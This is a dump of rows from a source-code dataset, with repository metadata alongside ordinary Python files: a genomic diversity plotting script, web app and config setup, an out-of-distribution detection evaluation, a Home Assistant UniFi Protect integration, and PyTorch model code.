hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4f02ae733180f986bfa8ad821e035c475bfc474f | 141 | py | Python | utils/dataset.py | laura-ham/INTEX | 07bcf26ca17092ecf4fc41b85ea9d764a0caa8c9 | [
"MIT"
] | null | null | null | utils/dataset.py | laura-ham/INTEX | 07bcf26ca17092ecf4fc41b85ea9d764a0caa8c9 | [
"MIT"
] | null | null | null | utils/dataset.py | laura-ham/INTEX | 07bcf26ca17092ecf4fc41b85ea9d764a0caa8c9 | [
"MIT"
] | null | null | null | from utils import s3
| 17.625 | 41 | 0.652482 | from utils import s3
class Dataset:
def __init__(self, config):
self.config = config
self.s3agent = s3.S3Agent(config)
| 77 | -7 | 49 |
5963efd1925be94ab61751d8d9cca058c69ecbc8 | 1,453 | py | Python | scripts/vcftools_pi_region.py | godzilla-but-nicer/INFO590-term-project | 4c8270cfb667ef38c4c4bd5bd0c010949280ce75 | [
"MIT"
] | null | null | null | scripts/vcftools_pi_region.py | godzilla-but-nicer/INFO590-term-project | 4c8270cfb667ef38c4c4bd5bd0c010949280ce75 | [
"MIT"
] | null | null | null | scripts/vcftools_pi_region.py | godzilla-but-nicer/INFO590-term-project | 4c8270cfb667ef38c4c4bd5bd0c010949280ce75 | [
"MIT"
] | 1 | 2020-11-02T00:23:08.000Z | 2020-11-02T00:23:08.000Z | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import sys
# load a datafile, handle some command line args
smoothing = int(sys.argv[2]) # window size for smoothing
data_file = sys.argv[1]
name = data_file.split('/')[-1].split('.')[0] # used in output
df = pd.read_csv(data_file, index_col=None, sep='\t')
# get the bin size of the windows
window_size = (df['BIN_END'] - df['BIN_START']).values[0] + 1
window_rad = int(window_size / 2)
# calculate ranges for the y axis
pi_arr = df['PI'].values
low_percentile = 1
high_percentile = 100 - low_percentile
mean_low = np.percentile(pi_arr, low_percentile)
mean_high = np.percentile(pi_arr, high_percentile)
# calculate the smoothed lines
# we're going to reject outliers for this part and only keep data that falls
# below the 'high' percentile
mean_vals = pi_arr
mean_vals[mean_vals > mean_high] = mean_high
smooth_radius = int(smoothing / 2)
smoothed_mean = np.zeros(df.shape[0])
for w in range(smooth_radius, df.shape[0] - smooth_radius):
smoothed_mean[w] = np.mean(mean_vals[w - smooth_radius : w + smooth_radius])
fig, ax = plt.subplots()
ax.plot(df['BIN_START'] + window_rad, pi_arr, c='grey', alpha=0.5)
ax.plot(df['BIN_START'][smooth_radius:-smooth_radius] + window_rad, smoothed_mean[smooth_radius:-smooth_radius], c='C0')
ax.set_ylabel(r'Binned $\pi$')
ax.set_ylim((mean_low, mean_high))
# output name
plt.savefig('../plots/pi_plots/' + name + '_pi_region.png') | 33.790698 | 120 | 0.734343 | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import sys
# load a datafile, handle some command line args
smoothing = int(sys.argv[2]) # window size for smoothing
data_file = sys.argv[1]
name = data_file.split('/')[-1].split('.')[0] # used in output
df = pd.read_csv(data_file, index_col=None, sep='\t')
# get the bin size of the windows
window_size = (df['BIN_END'] - df['BIN_START']).values[0] + 1
window_rad = int(window_size / 2)
# calculate ranges for the y axis
pi_arr = df['PI'].values
low_percentile = 1
high_percentile = 100 - low_percentile
mean_low = np.percentile(pi_arr, low_percentile)
mean_high = np.percentile(pi_arr, high_percentile)
# calculate the smoothed lines
# we're going to reject outliers for this part and only keep data that falls
# below the 'high' percentile
mean_vals = pi_arr
mean_vals[mean_vals > mean_high] = mean_high
smooth_radius = int(smoothing / 2)
smoothed_mean = np.zeros(df.shape[0])
for w in range(smooth_radius, df.shape[0] - smooth_radius):
smoothed_mean[w] = np.mean(mean_vals[w - smooth_radius : w + smooth_radius])
fig, ax = plt.subplots()
ax.plot(df['BIN_START'] + window_rad, pi_arr, c='grey', alpha=0.5)
ax.plot(df['BIN_START'][smooth_radius:-smooth_radius] + window_rad, smoothed_mean[smooth_radius:-smooth_radius], c='C0')
ax.set_ylabel(r'Binned $\pi$')
ax.set_ylim((mean_low, mean_high))
# output name
plt.savefig('../plots/pi_plots/' + name + '_pi_region.png') | 0 | 0 | 0 |
ea5be5a1531f6e9ad888a3690ee07d431e52f364 | 606 | py | Python | src/entities/ennemies/truck.py | evrardco/GameJam-lln-2021 | ee2cce0feb423a0b3319c9933c8c8b5748225e39 | [
"MIT"
] | 1 | 2021-03-21T23:18:32.000Z | 2021-03-21T23:18:32.000Z | src/entities/ennemies/truck.py | evrardco/GameJam-lln-2021 | ee2cce0feb423a0b3319c9933c8c8b5748225e39 | [
"MIT"
] | null | null | null | src/entities/ennemies/truck.py | evrardco/GameJam-lln-2021 | ee2cce0feb423a0b3319c9933c8c8b5748225e39 | [
"MIT"
] | null | null | null | from arcade.sprite import Sprite
from src.entities.ennemies.base_enemy import BaseEnemy
from os.path import join
from math import pi
| 30.3 | 95 | 0.529703 | from arcade.sprite import Sprite
from src.entities.ennemies.base_enemy import BaseEnemy
from os.path import join
from math import pi
class Truck(BaseEnemy):
def __init__(self, *args, **kwargs):
super().__init__(
*args, **kwargs,
filename=join("assets", "entities", "ennemies", "basic_truck.png"),
scale=0.3,
)
self.max_health = 100
self.health = self.max_health
self.speed = 50
self.radians = 3 * pi/2
self.dmg = 10
self.reward = 2
| 417 | 2 | 48 |
77497299eae4d24d8b5e97a524c3c366fa1194ce | 678 | py | Python | app/__init__.py | toledoneto/sistema_login | 79223decd228c18f52bf8fed2b79361455ad7fa2 | [
"MIT"
] | null | null | null | app/__init__.py | toledoneto/sistema_login | 79223decd228c18f52bf8fed2b79361455ad7fa2 | [
"MIT"
] | null | null | null | app/__init__.py | toledoneto/sistema_login | 79223decd228c18f52bf8fed2b79361455ad7fa2 | [
"MIT"
] | null | null | null | from bottle import Bottle, TEMPLATE_PATH
from bottle.ext import sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
#from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('sqlite:///database.db', echo = True)
#create_session = sessionmaker(bind = engine)
app = Bottle()
TEMPLATE_PATH.insert(0, 'app/views/')
plugin = sqlalchemy.Plugin(
engine,
Base.metadata,
keyword = 'db',
create = True,
commit = True,
use_kwargs = False)
app.install(plugin)
from app.controllers import default
from app.models import tables | 28.25 | 61 | 0.699115 | from bottle import Bottle, TEMPLATE_PATH
from bottle.ext import sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
#from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('sqlite:///database.db', echo = True)
#create_session = sessionmaker(bind = engine)
app = Bottle()
TEMPLATE_PATH.insert(0, 'app/views/')
plugin = sqlalchemy.Plugin(
engine,
Base.metadata,
keyword = 'db',
create = True,
commit = True,
use_kwargs = False)
app.install(plugin)
from app.controllers import default
from app.models import tables | 0 | 0 | 0 |
944b1a4eae46848bf72f467c30cdf93199d1913b | 211 | py | Python | plgx-esp/tests/test_celery/test_celery.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | null | null | null | plgx-esp/tests/test_celery/test_celery.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | null | null | null | plgx-esp/tests/test_celery/test_celery.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | 2 | 2021-11-12T10:25:02.000Z | 2022-03-30T06:33:52.000Z | # # -*- coding: utf-8 -*-
from polylogyx.celery.tasks import example_task
| 23.444444 | 47 | 0.663507 | # # -*- coding: utf-8 -*-
from polylogyx.celery.tasks import example_task
class TestCelery:
def test_celery_simple(self,celery_worker):
res = example_task.delay(1, 2)
assert res.get() == 3
| 91 | -4 | 49 |
5ffa1b866a3a10cef750ebb9fd6bb3816880e981 | 1,102 | py | Python | app/utils/config.py | adipopbv/mooover-backend | b8409ea48a3aa12d21c3b41622c7c071b4964404 | [
"BSD-3-Clause"
] | null | null | null | app/utils/config.py | adipopbv/mooover-backend | b8409ea48a3aa12d21c3b41622c7c071b4964404 | [
"BSD-3-Clause"
] | 1 | 2022-03-31T10:24:14.000Z | 2022-03-31T10:24:14.000Z | app/utils/config.py | adipopbv/mooover-backend | b8409ea48a3aa12d21c3b41622c7c071b4964404 | [
"BSD-3-Clause"
] | null | null | null | import os
from configparser import ConfigParser
from app.domain.errors import NotFoundError
class AppConfig:
"""The configurations of the app at runtime"""
__instance = None
config = None
auth0_config = None
neo4j_config = None
@staticmethod
def _load_config() -> ConfigParser:
"""
Loads the .config file from the root of the project.
:return: the config
"""
env = os.getenv("ENV", ".config")
if env == ".config":
config = ConfigParser()
config.read([".config", ".test.config", "test/.test.config"])
return config
raise NotFoundError("config file not found")
| 29 | 73 | 0.585299 | import os
from configparser import ConfigParser
from app.domain.errors import NotFoundError
class AppConfig:
"""The configurations of the app at runtime"""
__instance = None
config = None
auth0_config = None
neo4j_config = None
def __new__(cls):
if cls.__instance is None:
cls.__instance = super(AppConfig, cls).__new__(cls)
cls.config = cls._load_config()
try:
cls.auth0_config = cls.config["AUTH0"]
cls.neo4j_config = cls.config["NEO4J"]
except KeyError as e:
raise NotFoundError(f"{e} config not found")
return cls.__instance
@staticmethod
def _load_config() -> ConfigParser:
"""
Loads the .config file from the root of the project.
:return: the config
"""
env = os.getenv("ENV", ".config")
if env == ".config":
config = ConfigParser()
config.read([".config", ".test.config", "test/.test.config"])
return config
raise NotFoundError("config file not found")
| 391 | 0 | 27 |
1707c9e1271bd1f3982869b3232fb3258eeb474a | 6,242 | py | Python | methods/mahalanobis_ensemble.py | christophbrgr/ood_detection_framework | c3b7e3064ed8ee4aeb112cd2ab946ee41636f79f | [
"MIT"
] | 7 | 2021-07-26T14:28:51.000Z | 2021-11-18T13:20:00.000Z | methods/mahalanobis_ensemble.py | christophbrgr/ood_detection_framework | c3b7e3064ed8ee4aeb112cd2ab946ee41636f79f | [
"MIT"
] | null | null | null | methods/mahalanobis_ensemble.py | christophbrgr/ood_detection_framework | c3b7e3064ed8ee4aeb112cd2ab946ee41636f79f | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import numpy as np
from torch.autograd import Variable
import sys
from tqdm import tqdm
from util import helpers
from util.mahalanobis_lib import get_Mahalanobis_score, sample_estimator, sample_estimator_cifar10
from util.metrics import get_metrics
| 32.175258 | 155 | 0.60141 | import torch
import torch.nn as nn
import numpy as np
from torch.autograd import Variable
import sys
from tqdm import tqdm
from util import helpers
from util.mahalanobis_lib import get_Mahalanobis_score, sample_estimator, sample_estimator_cifar10
from util.metrics import get_metrics
def eval(path_in, path_out, models, trainloader, testloader, oodloader, use_cuda=True, verbose=True, magnitude=0.0, num_classes=10, save_dir=None):
# loading data sets
for model in models:
model.eval()
model.cuda()
temp_x = torch.rand(2, 3, 32, 32)
temp_x = Variable(temp_x.cuda())
temp_list = model.feature_list(temp_x)[1]
num_output = len(temp_list)
feature_list = np.empty(num_output)
count = 0
for out in temp_list:
feature_list[count] = out.size(1)
count += 1
sample_mean = []
precision = []
models_count = len(models)
for i, model in enumerate(models):
sample_mean_new, precision_new = sample_estimator(
model, num_classes=num_classes, feature_list=feature_list, train_loader=trainloader)
sample_mean.append(sample_mean_new)
precision.append(precision_new)
print(
f'Estimated sample mean and precision for {i+1} out of {models_count} models.')
f1 = open(path_in, 'w')
f2 = open(path_out, 'w')
########################################In-distribution###########################################
print("Processing in-distribution images")
count = 0
for j, data in tqdm(enumerate(testloader)):
images, _, _ = data
batch_size = images.shape[0]
inputs = images.cuda()
Mahalanobis_scores = []
for i, model in enumerate(models):
Mahalanobis_scores.append(get_Mahalanobis_score(
model, inputs, num_classes, sample_mean[i], precision[i], num_output, magnitude))
out_stack = np.stack(Mahalanobis_scores, axis=2)
nnOutputs = np.mean(out_stack, axis=2)
for k in range(batch_size):
f1.write("{}\n".format(nnOutputs[k, 0]))
count += batch_size
# print("{:4}/{:4} images processed.".format(count, len(testloader.dataset)))
###################################Out-of-Distributions#####################################
print("Processing out-of-distribution images")
count = 0
for j, data in tqdm(enumerate(oodloader)):
images, labels, _ = data
batch_size = images.shape[0]
inputs = images.cuda()
Mahalanobis_scores = []
for i, model in enumerate(models):
Mahalanobis_scores.append(get_Mahalanobis_score(
model, inputs, num_classes, sample_mean[i], precision[i], num_output, magnitude))
out_stack = np.stack(Mahalanobis_scores, axis=2)
nnOutputs = np.mean(out_stack, axis=2)
for k in range(batch_size):
f2.write("{}\n".format(nnOutputs[k, 0]))
count += batch_size
#print(tqdm("{:4}/{:4} images processed.".format(count, len(oodloader.dataset)))
f1.close()
f2.close()
# auroc, aucpr, _, _ = get_metrics(pathIn, pathOut)
# print('Mahalanobis AUROC: {}, AUCPR: {}'.format(auroc, aucpr))
# return
def eval_cifar10(path_in, path_out, models, trainloader, testloader, oodloader, use_cuda=True, verbose=True, magnitude=0.0, num_classes=10, save_dir=None):
# loading data sets
for model in models:
model.eval()
model.cuda()
temp_x = torch.rand(2, 3, 32, 32)
temp_x = Variable(temp_x.cuda())
temp_list = model.feature_list(temp_x)[1]
num_output = len(temp_list)
feature_list = np.empty(num_output)
count = 0
for out in temp_list:
feature_list[count] = out.size(1)
count += 1
sample_mean = []
precision = []
models_count = len(models)
for i, model in enumerate(models):
sample_mean_new, precision_new = sample_estimator_cifar10(
model, num_classes=num_classes, feature_list=feature_list, train_loader=trainloader)
sample_mean.append(sample_mean_new)
precision.append(precision_new)
print(f'Estimated sample mean and precision for {i+1} out of {models_count} models.')
f1 = open(path_in, 'w')
f2 = open(path_out, 'w')
########################################In-distribution###########################################
print("Processing in-distribution images")
count = 0
for j, data in tqdm(enumerate(testloader)):
images, _ = data
batch_size = images.shape[0]
inputs = images.cuda()
Mahalanobis_scores = []
for i, model in enumerate(models):
Mahalanobis_scores.append(get_Mahalanobis_score(
model, inputs, num_classes, sample_mean[i], precision[i], num_output, magnitude))
out_stack = np.stack(Mahalanobis_scores, axis=2)
nnOutputs = np.mean(out_stack, axis=2)
for k in range(batch_size):
f1.write("{}\n".format(nnOutputs[k, 0]))
count += batch_size
#print("{:4}/{:4} images processed.".format(count, len(testloader.dataset)))
###################################Out-of-Distributions#####################################
print("Processing out-of-distribution images")
count = 0
for j, data in tqdm(enumerate(oodloader)):
images, labels = data
batch_size = images.shape[0]
inputs = images.cuda()
Mahalanobis_scores = []
for i, model in enumerate(models):
Mahalanobis_scores.append(get_Mahalanobis_score(
model, inputs, num_classes, sample_mean[i], precision[i], num_output, magnitude))
out_stack = np.stack(Mahalanobis_scores, axis=2)
nnOutputs = np.mean(out_stack, axis=2)
for k in range(batch_size):
f2.write("{}\n".format(nnOutputs[k, 0]))
count += batch_size
#print("{:4}/{:4} images processed.".format(count, len(oodloader.dataset)))
f1.close()
f2.close()
# auroc, aucpr, _, _ = get_metrics(pathIn, pathOut)
# print('Mahalanobis AUROC: {}, AUCPR: {}'.format(auroc, aucpr))
# return
def train():
pass
| 5,887 | 0 | 69 |
d143715ea7853cf0305ac941de7d955ebe402167 | 580 | py | Python | backend/kesaseteli/applications/api/v1/views.py | iivoraitahila/yjdh | 4a9b46e0458529548af818534600eadd4f96a048 | [
"MIT"
] | null | null | null | backend/kesaseteli/applications/api/v1/views.py | iivoraitahila/yjdh | 4a9b46e0458529548af818534600eadd4f96a048 | [
"MIT"
] | null | null | null | backend/kesaseteli/applications/api/v1/views.py | iivoraitahila/yjdh | 4a9b46e0458529548af818534600eadd4f96a048 | [
"MIT"
] | null | null | null | from rest_framework import status
from rest_framework.response import Response
from shared.audit_log.viewsets import AuditLoggingModelViewSet
from applications.api.v1.serializers import ApplicationSerializer
from applications.models import Application
| 34.117647 | 78 | 0.812069 | from rest_framework import status
from rest_framework.response import Response
from shared.audit_log.viewsets import AuditLoggingModelViewSet
from applications.api.v1.serializers import ApplicationSerializer
from applications.models import Application
class ApplicationViewSet(AuditLoggingModelViewSet):
queryset = Application.objects.select_related("company").prefetch_related(
"summer_vouchers"
)
serializer_class = ApplicationSerializer
def destroy(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
| 90 | 213 | 23 |
6f7644da3b3841b77e76a862a2ddd1f5d134c822 | 5,824 | py | Python | custom_components/unifiprotect/number.py | mjdyson/unifiprotect | 42846cc4e3c77dc93e7008d45919bdc0965fd336 | [
"MIT"
] | 546 | 2019-12-28T13:37:24.000Z | 2022-03-29T18:48:54.000Z | custom_components/unifiprotect/number.py | mjdyson/unifiprotect | 42846cc4e3c77dc93e7008d45919bdc0965fd336 | [
"MIT"
] | 358 | 2020-01-01T11:17:24.000Z | 2022-02-03T17:34:00.000Z | custom_components/unifiprotect/number.py | mjdyson/unifiprotect | 42846cc4e3c77dc93e7008d45919bdc0965fd336 | [
"MIT"
] | 51 | 2020-01-12T21:35:06.000Z | 2022-02-01T06:26:27.000Z | """This component provides number entities for UniFi Protect."""
from __future__ import annotations
from dataclasses import dataclass
from datetime import timedelta
import logging
from typing import Callable, Sequence
from homeassistant.components.number import NumberEntity, NumberEntityDescription
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ENTITY_CATEGORY_CONFIG
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity import Entity
from pyunifiprotect.data.devices import Camera, Light
from .const import DOMAIN
from .data import ProtectData
from .entity import ProtectDeviceEntity, async_all_device_entities
from .models import ProtectRequiredKeysMixin
from .utils import get_nested_attr
_LOGGER = logging.getLogger(__name__)
_KEY_WDR = "wdr_value"
_KEY_MIC_LEVEL = "mic_level"
_KEY_ZOOM_POS = "zoom_position"
_KEY_SENSITIVITY = "sensitivity"
_KEY_DURATION = "duration"
_KEY_CHIME = "chime_duration"
@dataclass
class NumberKeysMixin:
"""Mixin for required keys."""
ufp_max: int
ufp_min: int
ufp_step: int
ufp_set_function: str
@dataclass
class ProtectNumberEntityDescription(
ProtectRequiredKeysMixin, NumberEntityDescription, NumberKeysMixin
):
"""Describes UniFi Protect Number entity."""
CAMERA_NUMBERS: tuple[ProtectNumberEntityDescription, ...] = (
ProtectNumberEntityDescription(
key=_KEY_WDR,
name="Wide Dynamic Range",
icon="mdi:state-machine",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=3,
ufp_step=1,
ufp_required_field="feature_flags.has_wdr",
ufp_value="isp_settings.wdr",
ufp_set_function="set_wdr_level",
),
ProtectNumberEntityDescription(
key=_KEY_MIC_LEVEL,
name="Microphone Level",
icon="mdi:microphone",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=100,
ufp_step=1,
ufp_required_field="feature_flags.has_mic",
ufp_value="mic_volume",
ufp_set_function="set_mic_volume",
),
ProtectNumberEntityDescription(
key=_KEY_ZOOM_POS,
name="Zoom Position",
icon="mdi:magnify-plus-outline",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=100,
ufp_step=1,
ufp_required_field="feature_flags.can_optical_zoom",
ufp_value="isp_settings.zoom_position",
ufp_set_function="set_camera_zoom",
),
ProtectNumberEntityDescription(
key=_KEY_CHIME,
name="Duration",
icon="mdi:camera-timer",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=10000,
ufp_step=100,
ufp_required_field="feature_flags.has_chime",
ufp_value="chime_duration",
ufp_set_function="set_chime_duration",
),
)
LIGHT_NUMBERS: tuple[ProtectNumberEntityDescription, ...] = (
ProtectNumberEntityDescription(
key=_KEY_SENSITIVITY,
name="Motion Sensitivity",
icon="mdi:walk",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=100,
ufp_step=1,
ufp_required_field=None,
ufp_value="light_device_settings.pir_sensitivity",
ufp_set_function="set_sensitivity",
),
ProtectNumberEntityDescription(
key=_KEY_DURATION,
name="Duration",
icon="mdi:camera-timer",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=15,
ufp_max=900,
ufp_step=15,
ufp_required_field=None,
ufp_value="light_device_settings.pir_duration",
ufp_set_function="set_duration",
),
)
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: Callable[[Sequence[Entity]], None],
) -> None:
"""Set up number entities for UniFi Protect integration."""
data: ProtectData = hass.data[DOMAIN][entry.entry_id]
entities: list[ProtectDeviceEntity] = async_all_device_entities(
data,
ProtectNumbers,
camera_descs=CAMERA_NUMBERS,
light_descs=LIGHT_NUMBERS,
)
async_add_entities(entities)
class ProtectNumbers(ProtectDeviceEntity, NumberEntity):
"""A UniFi Protect Number Entity."""
def __init__(
self,
data: ProtectData,
device: Camera | Light,
description: ProtectNumberEntityDescription,
) -> None:
"""Initialize the Number Entities."""
self.device: Camera | Light = device
self.entity_description: ProtectNumberEntityDescription = description
super().__init__(data)
self._attr_max_value = self.entity_description.ufp_max
self._attr_min_value = self.entity_description.ufp_min
self._attr_step = self.entity_description.ufp_step
@callback
async def async_set_value(self, value: float) -> None:
"""Set new value."""
function = self.entity_description.ufp_set_function
_LOGGER.debug(
"Calling %s to set %s for Camera %s",
function,
value,
self.device.name,
)
set_value: float | timedelta = value
if self.entity_description.key == _KEY_DURATION:
set_value = timedelta(seconds=value)
await getattr(self.device, function)(set_value)
| 30.176166 | 81 | 0.685783 | """This component provides number entities for UniFi Protect."""
from __future__ import annotations
from dataclasses import dataclass
from datetime import timedelta
import logging
from typing import Callable, Sequence
from homeassistant.components.number import NumberEntity, NumberEntityDescription
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ENTITY_CATEGORY_CONFIG
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity import Entity
from pyunifiprotect.data.devices import Camera, Light
from .const import DOMAIN
from .data import ProtectData
from .entity import ProtectDeviceEntity, async_all_device_entities
from .models import ProtectRequiredKeysMixin
from .utils import get_nested_attr
_LOGGER = logging.getLogger(__name__)
_KEY_WDR = "wdr_value"
_KEY_MIC_LEVEL = "mic_level"
_KEY_ZOOM_POS = "zoom_position"
_KEY_SENSITIVITY = "sensitivity"
_KEY_DURATION = "duration"
_KEY_CHIME = "chime_duration"
@dataclass
class NumberKeysMixin:
"""Mixin for required keys."""
ufp_max: int
ufp_min: int
ufp_step: int
ufp_set_function: str
@dataclass
class ProtectNumberEntityDescription(
ProtectRequiredKeysMixin, NumberEntityDescription, NumberKeysMixin
):
"""Describes UniFi Protect Number entity."""
CAMERA_NUMBERS: tuple[ProtectNumberEntityDescription, ...] = (
ProtectNumberEntityDescription(
key=_KEY_WDR,
name="Wide Dynamic Range",
icon="mdi:state-machine",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=3,
ufp_step=1,
ufp_required_field="feature_flags.has_wdr",
ufp_value="isp_settings.wdr",
ufp_set_function="set_wdr_level",
),
ProtectNumberEntityDescription(
key=_KEY_MIC_LEVEL,
name="Microphone Level",
icon="mdi:microphone",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=100,
ufp_step=1,
ufp_required_field="feature_flags.has_mic",
ufp_value="mic_volume",
ufp_set_function="set_mic_volume",
),
ProtectNumberEntityDescription(
key=_KEY_ZOOM_POS,
name="Zoom Position",
icon="mdi:magnify-plus-outline",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=100,
ufp_step=1,
ufp_required_field="feature_flags.can_optical_zoom",
ufp_value="isp_settings.zoom_position",
ufp_set_function="set_camera_zoom",
),
ProtectNumberEntityDescription(
key=_KEY_CHIME,
name="Duration",
icon="mdi:camera-timer",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=10000,
ufp_step=100,
ufp_required_field="feature_flags.has_chime",
ufp_value="chime_duration",
ufp_set_function="set_chime_duration",
),
)
LIGHT_NUMBERS: tuple[ProtectNumberEntityDescription, ...] = (
ProtectNumberEntityDescription(
key=_KEY_SENSITIVITY,
name="Motion Sensitivity",
icon="mdi:walk",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=0,
ufp_max=100,
ufp_step=1,
ufp_required_field=None,
ufp_value="light_device_settings.pir_sensitivity",
ufp_set_function="set_sensitivity",
),
ProtectNumberEntityDescription(
key=_KEY_DURATION,
name="Duration",
icon="mdi:camera-timer",
entity_category=ENTITY_CATEGORY_CONFIG,
ufp_min=15,
ufp_max=900,
ufp_step=15,
ufp_required_field=None,
ufp_value="light_device_settings.pir_duration",
ufp_set_function="set_duration",
),
)
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: Callable[[Sequence[Entity]], None],
) -> None:
"""Set up number entities for UniFi Protect integration."""
data: ProtectData = hass.data[DOMAIN][entry.entry_id]
entities: list[ProtectDeviceEntity] = async_all_device_entities(
data,
ProtectNumbers,
camera_descs=CAMERA_NUMBERS,
light_descs=LIGHT_NUMBERS,
)
async_add_entities(entities)
class ProtectNumbers(ProtectDeviceEntity, NumberEntity):
"""A UniFi Protect Number Entity."""
def __init__(
self,
data: ProtectData,
device: Camera | Light,
description: ProtectNumberEntityDescription,
) -> None:
"""Initialize the Number Entities."""
self.device: Camera | Light = device
self.entity_description: ProtectNumberEntityDescription = description
super().__init__(data)
self._attr_max_value = self.entity_description.ufp_max
self._attr_min_value = self.entity_description.ufp_min
self._attr_step = self.entity_description.ufp_step
@callback
def _async_update_device_from_protect(self) -> None:
super()._async_update_device_from_protect()
if self.entity_description.ufp_value is None:
return
value: float | timedelta = get_nested_attr(
self.device, self.entity_description.ufp_value
)
if isinstance(value, timedelta):
self._attr_value = int(value.total_seconds())
else:
self._attr_value = value
async def async_set_value(self, value: float) -> None:
"""Set new value."""
function = self.entity_description.ufp_set_function
_LOGGER.debug(
"Calling %s to set %s for Camera %s",
function,
value,
self.device.name,
)
set_value: float | timedelta = value
if self.entity_description.key == _KEY_DURATION:
set_value = timedelta(seconds=value)
await getattr(self.device, function)(set_value)
| 430 | 0 | 26 |
af8460c21a11a051c1a66f7447d560926f9c0c4f | 2,929 | py | Python | Food_recognition/detection.py | KiaKafaei1/Data_Science_Portfolio | 9bfa29632d664c6bad9589106e47a455041f0d2c | [
"MIT"
] | null | null | null | Food_recognition/detection.py | KiaKafaei1/Data_Science_Portfolio | 9bfa29632d664c6bad9589106e47a455041f0d2c | [
"MIT"
] | null | null | null | Food_recognition/detection.py | KiaKafaei1/Data_Science_Portfolio | 9bfa29632d664c6bad9589106e47a455041f0d2c | [
"MIT"
] | null | null | null | import matplotlib
import numpy as np
import pandas as pd
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms
import cv2
from PIL import Image
import matplotlib.pyplot as plt
import glob
import os
from IPython.display import clear_output
from skimage.io import imread
from skimage.transform import resize
from google.colab import drive
import sys
# run GPU ....
if(torch.cuda.is_available()):
device = torch.device("cuda")
print(device, torch.cuda.get_device_name(0))
else:
device= torch.device("cpu")
print(device)
size = (7, 7)
| 35.719512 | 141 | 0.694776 | import matplotlib
import numpy as np
import pandas as pd
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms
import cv2
from PIL import Image
import matplotlib.pyplot as plt
import glob
import os
from IPython.display import clear_output
from skimage.io import imread
from skimage.transform import resize
from google.colab import drive
import sys
# run GPU ....
if(torch.cuda.is_available()):
device = torch.device("cuda")
print(device, torch.cuda.get_device_name(0))
else:
device= torch.device("cpu")
print(device)
size = (7, 7)
class Detection_Network(nn.Module):
def __init__(self):
super(Detection_Network, self).__init__()
self.adaptive_max_pool = nn.AdaptiveMaxPool2d(size[0], size[1])
self.roi_head_classifier = nn.Sequential(*[nn.Linear(25088, 4096), nn.Linear(4096, 4096)]).to(device)
self.cls_loc = nn.Linear(4096, 11 * 4).to(device) # (10 classes + 1 background. Each will have 4 co-ordinates)
self.score = nn.Linear(4096, 11).to(device) # (10 classes, + 1 background)
self.cls_loc.weight.data.normal_(0, 0.01)
self.cls_loc.bias.data.zero_()
def forward(self,sample_roi, out_map):
# 7x7x512 = 25088 this is the input size and 4096 is the output size which could be an image of 64x64.
# we first have a layer that reduces the input and the second layer doesn't reduce the input.
# The third layer reduces the image to an ouput list of size 8. Consiting of 2 classes (forground and background) and 4 coordinates which
# is the coordinate and a height and width.
# Get RoIs
